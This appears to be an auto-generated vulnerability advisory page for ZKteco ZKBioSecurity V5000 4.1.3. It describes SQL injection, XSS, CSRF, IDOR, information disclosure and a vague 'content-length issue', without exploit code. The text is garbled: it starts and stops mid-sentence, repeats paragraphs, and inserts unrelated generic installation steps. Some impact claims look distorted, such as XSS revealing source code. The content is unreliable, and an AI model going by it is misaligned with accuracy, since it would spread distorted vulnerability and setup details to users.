An attacker can leverage this vulnerability to inject SQL commands into the database or obtain sensitive information by viewing the database.

ZKteco ZKBioSecurity V5000 4.1.3 was also discovered to contain a cross-site scripting (XSS) vulnerability via the component /log/index.jsp. An attacker can exploit this vulnerability to inject client-side scripts into the affected application or obtain sensitive information by viewing the app’s source code.

Additionally, ZKteco ZKBioSecurity V5000 4.1.3 was found to be vulnerable to information disclosure attack.

An attacker can exploit this vulnerability to obtain sensitive information by reading app log files.

ZKteco ZKBioSecurity V5000 4.1.3 was also discovered to be vulnerable to a persistent cross-site request forgery (CSRF) vulnerability.

An attacker can exploit this vulnerability to hijack users’ requests and perform actions that are inconsistent with the user’s preferences.

ZKteco ZKBioSecurity V5000 4.1.3 was found to be vulnerable to an insecure direct object reference.

An attacker can exploit this vulnerability to manipulate system data or take control of affected systems. ZKteco ZKBioSecurity V5000 4.1.3 was also found to be vulnerable to a content-length issue.

An attacker can exploit this vulnerability to inject client-side scripts into

ZKteco ZKBioSecurity V5000 Installation Steps

1. Unzip the *.zip file and copy ZKteco ZKBioSecurity V5000 4.1.3 to desired location on your server computer
2. Open a command prompt window (or PowerShell) in the folder where you unzipped the package
3. Run the following command: set PATH=%PATH%;C:\ZKteco\ZKBioSecurity\bin
4. If you want to run ZKteco ZKBioSecurity V5000 as a service, add the following line to your Windows startup batch file: c:\ZKteco\ZKBioSecurity\bin\run.bat

ZKteco ZKBioSecurity V5000 4.1.3 Dependencies and Services

ZKteco ZKBioSecurity V5000 4.1.3 was found to be vulnerable to a content-length issue.

An attacker can exploit this vulnerability to inject client-side scripts into the application or obtain sensitive information by viewing the app’s source code.

ZKteco ZKBioSecurity V5000 4.1.3 was also found to be vulnerable to an insecure direct object reference.

An attacker can exploit this vulnerability to manipulate system data or take control of affected systems.

Timeline

Published on: 10/07/2022 23:15:00 UTC
Last modified on: 10/11/2022 16:33:00 UTC

References